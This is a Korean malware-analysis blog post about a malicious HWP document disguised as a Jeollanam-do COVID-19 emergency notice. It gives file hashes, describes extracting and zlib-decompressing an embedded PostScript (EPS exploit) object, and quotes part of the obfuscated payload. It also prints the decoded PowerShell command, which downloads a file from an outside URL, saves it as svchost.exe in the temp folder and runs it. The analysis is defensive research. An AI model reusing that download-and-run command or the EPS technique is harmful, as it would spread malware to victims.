디지털포렌식/악성코드 샘플 분석

전라남도 코로나 바이러스 대응 긴급 조회.hwp

Lhaaan 2023. 10. 28. 13:26

파일 구성

  • 파일명: 전라남도 코로나 바이러스 대응 긴급 조회.hwp
  • 해시값
    • MD5: 8451be72b75a38516e7ba7972729909e
    • SHA-1: 45de8115b49ef68915e868138c04da375dfb7096
    • SHA-256: 7050af905f1696b2b8cdb4c6e6805a618addf5acfbd4edc3fc807a663016ab26
  • 바이러스 토탈 조회시 드롭퍼, 다운로더 진단명이 제일 많이 보이는 것을 알 수 있음

SSVIEW

  • hwp파일의 OLE 객체 정보를 파싱해주는 도구로 내부 데이터를 뽑아낼 수 있다.
  • .ps(포스트 스크립트) 파일이 있는 것으로 보아 해당 BIN0005.ps 파일이 악성 파일을 다운로드 하는 쉘 코드로 추정된다.

BIN0005.ps

  • compress 되어 있는 형태라서 decompress를 진행해야 함

zlib decompress

  • 한글 문서형 악성코드는 한글의 eps 취약점을 사용하는 경우가 많다.
  • eps는 BinData 영역에 .eps 형태로 있는데 zlib으로 압축되어 있는 상태
  • 파이썬 코드를 통해 압축해제 가능
import zlib

indata = open("./BIN0005.ps", "rb").read()
outdata = zlib.decompress(indata, -15)
f = open("./BIN0005_decom.ps", "wb")
f.write(outdata)

Post Script 실행

  • 02078797A31370A78797A3939203136233238206164642078797A39392078797A31370A78797A3939203136233243206164642078797A39322078797A31370A78797A5F7365636F6E645F617272617930203136234230206164642078797A39372078797A31370A78797A5F7365636F6E645F617272617930203136233938206164642078797A39342078797A31370A78797A5F6C65616B65645F617272617920312067657420636C6F736566696C65> def image cvx exec
    • 코드의 끝 부분에 exec를 print로 변경해서 분석 진행
  • post script를 실행하기 위해 고스트 스크립트를 다운로드
  • 버전은 9.2.6으로 해야 해석이 된다. 최신버전은 해석을 안해줌 보안 이슈인지 모르겠음…
  • 난독화 되어 있는것으로 보이는데, 이것을 어떻게 해석해야할지 감이 안잡혔다.

Shellcode 분석

  • 포스트 스크립트 해석 후 코드 확인해 보니 shellcode로 추정되는 부분이 있었음
  •
  • 명령어: powershell (new-object System.Net.WebClient).DownloadFile('http://www.sofa.rs/wp-content/themes/twentynineteen/sass/layout/h1.jpg','%temp%\\\\\\\\svchost.exe'); %temp%\\svchost.exe;
  • “http://www.sofa.rs/wp-content/themes/twentynineteen/sass/layout/h1.jpg”를 다운로드 받을 때 temp 폴더에 svchost.exe 파일로 다운로드, 그 후에 바로 실행

svchost.exe